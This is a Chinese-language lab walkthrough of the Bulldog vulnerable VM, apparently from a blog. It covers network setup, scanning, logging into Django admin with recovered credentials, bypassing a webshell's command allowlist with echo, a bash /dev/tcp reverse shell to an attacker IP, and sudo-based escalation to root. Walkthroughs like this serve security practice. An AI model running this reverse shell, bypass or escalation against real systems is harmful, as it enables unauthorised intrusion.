文章介绍了在VirtuallBox中进行环境搭建,通过设置网络为仅主机模式和桥接模式进行靶机连接。执行端口扫描发现开启的23端口,并尝试通过telnet登录。通过目录扫描和源码分析获取到网站信息,利用webshell进行操作,并通过特定命令反弹shell。进一步,文章展示了提权过程,找到sudo密码并使用Python打开新终端以获得root权限。
环境搭建
在 virtuallBox 中打开靶机。
virtuallBox 网络连接方式设置为仅主机。
vmware 设置桥接模式的网卡为 VirtualBox Host-Only Ethernet Adapter。
kail 网络适配设置为 NAT 和 桥接。
来自:https://blog.youkuaiyun.com/LYJ20010728/article/details/119395324?spm=1001.2014.3001.5501
如果还是有问题最简单的方法就是直接还原网络适配器的默认值。
信息收集
端口扫描:
开了个 23 端口,如果有账密,直接 telnet 登录。
目录扫描:
/admin 提醒要是员工的用户名和密码。
在 /dev 中有对网站的一些见解,比如这个网站是 Django 等等,有个 webshell 页面,不过要验证,估计有个 cookie 啥的,在源码中还有一串 hash,解密
用这个登 Django 管理页面看下。
nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com bulldoglover
成功
webshell 可用。
getshell
虽然说只能运行六个命令,但是我们可以用 echo 绕过。
ifconfig
ls
echo
pwd
cat
rm
反弹 shell
echo 'bash -i >& /dev/tcp/192.168.56.102/9999 0>&1' | bash
提权
在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp 中找到sudo的密码:SUPERultimatePASSWORDyouCANTget
疑似 root 密码
提示我们要在终端上,那用 python 打开一个新终端
成功 root
sudo python -c 'import pty;pty.spawn("/bin/bash")'
SUPERultimatePASSWORDyouCANTget
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
